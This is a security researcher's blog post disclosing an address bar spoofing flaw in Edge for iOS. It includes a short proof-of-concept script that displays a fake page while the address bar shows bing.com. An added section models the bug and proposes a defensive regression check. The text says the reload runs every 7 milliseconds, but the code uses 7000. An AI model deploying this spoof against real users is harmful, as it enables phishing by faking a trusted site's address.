Hi, I am Rafay Baloch, a security researcher, author and a public speaker.

Microsoft Edge Browser for iOS - Address Bar Spoofing Vulnerability

 


In one of my previous posts, "Multiple Address Bar Spoofing Vulnerabilities In Mobile Browsers", I discussed several address bar spoofing vulnerabilities in major browsers uncovered during my research. However, there were several other vulnerabilities reported to other browsers for which the disclosure timeline of 60 days had not elapsed. Microsoft Edge browser was one of them.

The following is a proof of concept (POC) demonstrating a browser-based spoofing vulnerability in Edge Browser for iOS. The vulnerability is similar to the address bar spoofing in Safari browser, with a slight modification to the setInterval function. The vulnerability occurs because Edge preserves the requested URL in the address bar when it is requested over an arbitrary port; the setInterval function reloads bing.com:8080 every 7 milliseconds, and hence the user is unable to recognize the redirection from the original URL to the spoofed URL. The version affects

Address Bar Spoofing in Edge Browser 45.9.5 

Proof of Concept

<script>
    document.write("<h1>This is not Bing</h1>");
    location.href = "https://bing.com:8081";
    setInterval(function(){location.href="https://bing.com:8080"},7000);
</script>

Note: The value of the setInterval function may be adjusted according to the browser in order to achieve an effective URL spoof.
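The behaviour described above can be modelled as a tab that tracks a committed URL (the document on screen) and a pending URL (a navigation that has started but not been answered). The following is an added example, not code from the original post or from Edge: the Tab class, the two policy functions and the host attacker.example are assumptions made for illustration. It contrasts an address bar that shows the pending URL with one that shows only the committed URL.

```javascript
// Simplified model of one browser tab (an assumption for illustration, not Edge's code).
class Tab {
  constructor(url, addressBarPolicy) {
    this.committedUrl = url;   // document currently rendered
    this.pendingUrl = null;    // navigation started, no response yet
    this.policy = addressBarPolicy;
  }
  // Page script assigns location.href: a navigation starts, nothing is committed.
  startNavigation(url) { this.pendingUrl = url; }
  // The server answered: the new document replaces the old one.
  commit() {
    if (this.pendingUrl === null) return;
    this.committedUrl = this.pendingUrl;
    this.pendingUrl = null;
  }
  // The connection failed or timed out: the old document stays on screen.
  fail() { this.pendingUrl = null; }
  addressBar() { return this.policy(this); }
  // Spoofed when the origin shown differs from the origin of the rendered document.
  isSpoofed() {
    return new URL(this.addressBar()).origin !== new URL(this.committedUrl).origin;
  }
}

// Weak policy: show the pending URL as soon as a script-initiated navigation starts.
const showPending = (tab) => tab.pendingUrl ?? tab.committedUrl;
// Hardened policy: show only the URL of the committed document.
const showCommitted = (tab) => tab.committedUrl;

// Constructed scenario: the page keeps restarting a navigation to a port that never answers.
function simulate(policy, ticks = 3) {
  const tab = new Tab("https://attacker.example/poc.html", policy);
  const seen = [];
  for (let i = 0; i < ticks; i++) {
    tab.startNavigation("https://bing.com:8080/");
    seen.push({ shown: tab.addressBar(), rendered: tab.committedUrl, spoofed: tab.isSpoofed() });
    tab.fail(); // request times out; the script's timer then starts it again
  }
  return seen;
}

console.log(simulate(showPending));
console.log(simulate(showCommitted));
```

The same origin comparison works as a regression check for browser UI code: after any script-initiated navigation that has not committed, the displayed origin should still equal the origin of the rendered document.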



As always, I am highly indebted to Tod Beardsley from the Rapid7 team for his assistance in handling and coordinating the disclosure.
© 2023 All Rights Reserved by RHA Info Sec.